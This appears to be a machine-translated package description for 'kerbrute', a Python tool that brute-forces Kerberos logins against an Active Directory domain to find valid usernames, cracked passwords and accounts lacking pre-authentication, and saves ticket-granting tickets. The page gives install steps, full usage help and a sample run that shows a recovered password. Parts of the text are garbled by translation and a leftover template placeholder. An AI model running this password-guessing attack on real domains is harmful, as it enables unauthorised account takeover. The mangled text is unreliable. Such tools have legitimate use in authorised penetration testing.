Kerberos bruteforce实用程序
kerbrute的Python项目详细描述
克布鲁特
使用Impacket库执行kerberos暴力的脚本。在
当执行时,作为输入,它接收一个用户或用户列表以及一个密码或密码列表。然后is执行暴力攻击以枚举:
- 有效的用户名/密码对
- 有效用户名
- 不需要预身份验证的用户名
因此,脚本生成一个已发现的有效凭据的列表,并根据这些有效凭据生成TGT。在
安装
来自pypi:
pip3 install kerbrute
从回购:
^{pr2}$使用
无参数帮助:
root@kali:~# kerbrute Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation usage: kerbrute.py [-h][-debug](-user USER | -users USERS)[-password PASSWORD | -passwords PASSWORDS] -domain DOMAIN [-dc-ip <ip_address>][-threads THREADS][-outputfile OUTPUTFILE][-no-save-ticket] optional arguments: -h, --help show this help message and exit -debug Turn DEBUG output ON -user USER User to perform bruteforcing -users USERS File with user per line -password PASSWORD Password to perform bruteforcing -passwords PASSWORDS File with password per line -domain DOMAIN Domain to perform bruteforcing -dc-ip <ip_address> IP Address of the domain controller -threads THREADS Number of threads to perform bruteforcing. Default=1 -outputfile OUTPUTFILE File to save discovered user:password -no-save-ticket Do not save retrieved TGTs with correct credentials Examples: ./kerbrute.py -users users_file.txt -passwords passwords_file.txt -domain contoso.com
执行示例:
root@kali:~# kerbrute -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation [*]Stupendous=> triceratops:Sh4rpH0rns [*] Saved TGT in triceratops.ccache [*] Valid user=> velociraptor [NOT PREAUTH][*] Valid user=> trex [*] Saved discovered passwords in jurassic_passwords.txt
- 项目
标签: